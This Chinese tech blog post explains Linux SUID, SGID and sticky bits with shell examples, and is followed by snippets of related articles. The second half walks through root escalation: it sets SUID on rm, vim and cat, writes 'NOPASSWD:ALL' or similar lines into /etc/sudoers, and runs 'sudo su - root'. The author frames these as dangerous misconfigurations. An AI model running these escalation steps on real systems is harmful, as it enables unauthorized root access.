suid(特殊权限位)提权

最新推荐文章于 2024-05-28 15:45:10 发布
最新推荐文章于 2024-05-28 15:45:10 发布
阅读量1.8k 收藏 16
点赞数 3
分类专栏: Linux 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54666999/article/details/119176623
版权
本文介绍了SUID权限的概念及其在Linux系统中的应用。通过实例展示了如何使用passwd命令(拥有SUID权限)以非root用户身份修改/etc/shadow文件,解释了SUID权限使得用户能够临时提升权限执行特定命令。同时,警告了滥用带有SUID权限的危险命令如rm、vim和cat可能导致的安全风险,并提供了利用这些命令提权到root的示例。
摘要由CSDN通过智能技术生成

一、suid                         特殊权限

操作对象:  /etc/shadow              存放用户密码的文件
[root@oldboy /]# ls    /etc/shadow   -l
----------. 1 root root 1240 8月  31 01:36 /etc/shadow         #没有权限
[root@oldboy ~]# md5sum    /etc/shadow                          #做指纹
31d2d9e77650c8bd5a62b3ba88d48b1f    /etc/shadow


[oldboy@oldboy ~]$ whoami
oldboy
[oldboy@oldboy ~]$ passwd                      #修改了/etc/shadow
更改用户 oldboy 的密码 。
passwd:所有的身份验证令牌已经成功更新。

[root@oldboy ~]# md5sum /etc/shadow
9b20feb1326830523f02d505edab451d  /etc/shadow      #与前面的md5不一样,说明文件里已经改了

问题:oldboy用户使用passwd命令修改密码===改的文件/etc/shadow
因为/etc/shadow没有任何权限,所以oldboy使用passwd命令理论上没有办法修改/etc/shadow
而实际上确修改了,为什么呢?

答案:问题出在passwd命令身上,这个命令被设置了特殊权限位(suid)。

suid作用
1.针对二进制命令。(面向的对象是二进制命令)
2.给passwd命令设置了suid,则任何用户执行passwd命令都会拥有和passwd命令对应的用户的权限
[root@oldboy ~]# ls   -l    /usr/bin/passwd
-rwsr-xr-x. 1 root root 27856 4月   1 2020 /usr/bin/passwd

解析:pssswd命令在 /usr/bin/passwd目录下, /usr/bin/passwd目录对应的用户是root。即所有用户在执行passwd命令的时候都会获得root用户权限(rws)。

权限位

普通权限:9位    前三位    中三位    后三位
特殊权限:3位 

suid:用户
前三位用户位的x位:S s(x)            #用户位原来没有x的时候,是S;用户位原来有x的时候,用s代替x。
s 4
sgid:用户组
中三位用户组位的x位:S s(x)
s 2
粘滞位: /tmp(应用:/tmp里面的文件可以动,但是/tmp本身不能动)
后三位其他用户位:x位:T t(x)
t 1

二、实例应用

1)需求  oldboy用户无法删除文件,需要给rm命令增加s权限,需要在rm命令目录文件上增加s.

[root@oldboy ~]# chmod    4755    `which rm`
[root@oldboy ~]# ls   -l   `which rm`
-rwsr-xr-x. 1 root root 62872 8月  20 2019 /usr/bin/rm

或者
[root@oldboy ~]# chmod    u+s    `which rm`
[root@oldboy ~]# ls    -l    `which rm`
-rwsr-xr-x. 1 root root 62872 8月  20 2019 /usr/bin/rm

[root@oldboy /]# ls    -l    /bin/rm
-rwsr-xr-x. 1 root root 62872 8月  20 2019 /bin/rm

工作中绝对不能用suid提权,特别是本身有危害的命令:
passwd命令属于绿色无害命令

rm,vim,cat都是有害命令,防不胜防

2)test用户通过设置了suid的vim命令提权到root实践:
1.chmod      u+s    /bin/vim                 #必须root用户下
2.vim    /etc/sudoers                           #vim /etc/sudoers==visudo,在test用户下
test        ALL=(ALL)     NOPASSWD:ALL
3.sudo    su   -   root                           #切到root

3)利用cat命令被设置suid漏洞,提权到root权限

chmod    u+s     /bin/cat                   #企业人员设置
注意提前备份/etc/sudoers,否则可能操作不当破坏sudoers文件

[root@oldboy ~]# cat     >>/etc/sudoers             #先回车再输入内容
test       ALL=(ALL)       ALL
[root@oldboy ~]# tail    -1    /etc/sudoers
test    ALL=(ALL)    ALL

sudo    su    -    root                   #在text用户下执行

RootZY
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SUID提权
snowlyzz的博客
08-14 1777
久经不衰的SUID提权
linux 添加sbit权限,Linux特殊权限SUID、SGID、SBIT
weixin_36211712的博客
04-29 305
原标题:Linux特殊权限SUID、SGID、SBIT纯手工打造每一篇开源资讯与技术干货,数十万程序员和Linuxer已经关注。Linux技术交流QQ群:915246(七月份最新!!)对于linux中文件或目录的权限,应该都知道普通的rwx权限。我们先看看下面两个的权限是什么非常奇怪,/tmp目录和 passwd文件的权限怎么怪怪的,怎么有s和t权限呢。看了下面的内容你就明白了。1 SUID当s出...
简谈SUID提权
最新发布
2401_84466336的博客
05-28 1006
SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
Linux下用SUID提权
热门推荐
谢公子的博客
12-07 2万+
关于SUID详细:Linux下的用户、组和权限 SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来提权linux可行性的文件列表如下: nmap vim find bash more less nano cp 以下命令可以发现系统上运行...
Linux提权————利用SUID提权
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
SUID提权
一只web狗
07-01 1万+
SUID提权介绍
SUID提权(一)
02-19 504
大家好,我是东北码农。今天和大家分享linux下的SUID提权。 本文会按照下面主题进行分享: 什么是提权 什么是SUID提权 用户、进程凭证、文件权限 下一篇文章会分享: CVE-2021-4034 漏洞讲解 CVE-2021-4034 利用实战 这个漏洞发现还不到3个月,应该还可以用奥。 0x1 什么是提权 最近研究了一下CVE-2021-4034,利用polkit在linux提权漏洞提权就是一个非root用户,不知道root密码,利用漏洞获得root权限的过程。 看一下CVE-2
Linux使用suid vim.basic文件实现提权
09-14
这些命令会列出所有属于root用户并且设置了SUID的文件,包括`vim.basic`。提权的关键在于修改`/etc/passwd`文件,因为这个文件包含了用户的登录信息,包括用户名、密码、用户ID(UID)、组ID(GID)等。 要添加一...
权限提升-linux提权手法总结
01-14
通过向接受用户输入的程序注入特殊字符或通配符,有时可以触发意料之外的行为,进而实现提权。 #### 结论 Linux提权是一个复杂的过程,涉及到多方面的技术和策略。成功的提权不仅需要深入了解Linux系统的工作原理...
Linux基础课件特殊权限设置SUID权限共10页.pdf
11-21
本篇课件聚焦于Linux中的特殊权限——SUID(Set-User-ID)权限,通过10页的内容深入解析这一关键概念。 SUID权限Linux权限系统中的一个独特特性,允许用户临时获得执行文件所属者的权限。这种权限通常用于提供...
特殊权限SUID SGID SBIT.doc
04-26
特殊权限SUID SGID SBIT SUID(Set UID)是一种特殊权限,只能应用于二进制程序。它的主要功能是:在执行该程序的过程中,执行者将具有该程序拥有者的权限。这种权限仅在执行该程序的过程中有效。 SUID 的限制和...
Linux特殊权限SUID、SGID与SBIT的深入讲解
09-15
Linux系统中,权限管理是保障系统安全的关键一环,其中SUID(Set-User-ID)、SGID(Set-Group-ID)以及SBIT( Sticky Bit)是三种特殊权限设定,它们扩展了传统的rwx权限模型,提供了更精细的访问控制。...
Linux SUID 提权
柠檬木有枝
01-27 4828
文章目录0x00 前言0x01 关于 SUID1.1 /etc/sudoers 语法1.2 查找具有 SUID 权限文件0x02 常用提权方式2.1 nmap2.2 find2.3 vi/vim2.4 bash2.5 less2.6 more2.7 cp2.8 mv2.9 nano2.10 awk2.11 man2.12 wget2.13 apache2.14 tcpdump2.15 pytho...
suid提权linux
weixin_68652890的博客
04-15 984
suid提权 suid(设置用户的id)是Linux中的一种特殊权限,当运行具有suid权限的二进制文件的时候,使得调用者暂时获得该文件拥有者的权限(比如a文件拥有者是root,且被赋予了s权限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root权限) 除了经常看见的rwx权限还有s权限 s权限,设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s权限,就被称为Set UID,简称为SUID特殊权限。简称为SUID特殊
SUID提权教程
星虐
11-18 1228
SUID提权教程。
Linux提权SUID提权
CP1024的博客
04-04 3824
Linux提权SUID提权 SUID提权 1. SUID权限只能设置二进制文件 2. 命令执行者要有二进制文件的执行权 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID权限只在程序执行中有效 即如果root给一个程序赋予了SUID权限,则普通用户在执行该程序过程中,是root权限 cp命令提权 以cp为例,这里给cp添加SUID权限做测试,拥有SUID权限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
[内网渗透]SUID提权
leekos的博客,分享web安全相关知识~
07-28 506
suid(set uid)是linux中的一种特殊权限suid可以让调用者以文件拥有者身份运行该文件,所以利用suid提权的核心就是运行root用户所拥有的suid的文件,那么运行该文件的时候就得获得root用户的身份了。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义在执行过程中,调用者会暂时获得该文件的属主权限,且该权限只在程序执行的过程中有效。通俗的来讲,假设我们现在有一个可执行文件/bin/find,其属主为root。当我们通过非root用户登录时,如果。
linux系统suid提权
focus on security
05-19 5546
SUID提权 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
SUID date提权
09-10
SUID date 提权指的是使用 date 命令的 SUID 权限来提升执行者的权限。 要使用 SUID date 进行提权,可以按照以下步骤操作: 1. 确保 date 命令具有 SUID 权限:使用 `ls -l $(which date)` 命令检查 date 命令的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RootZY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值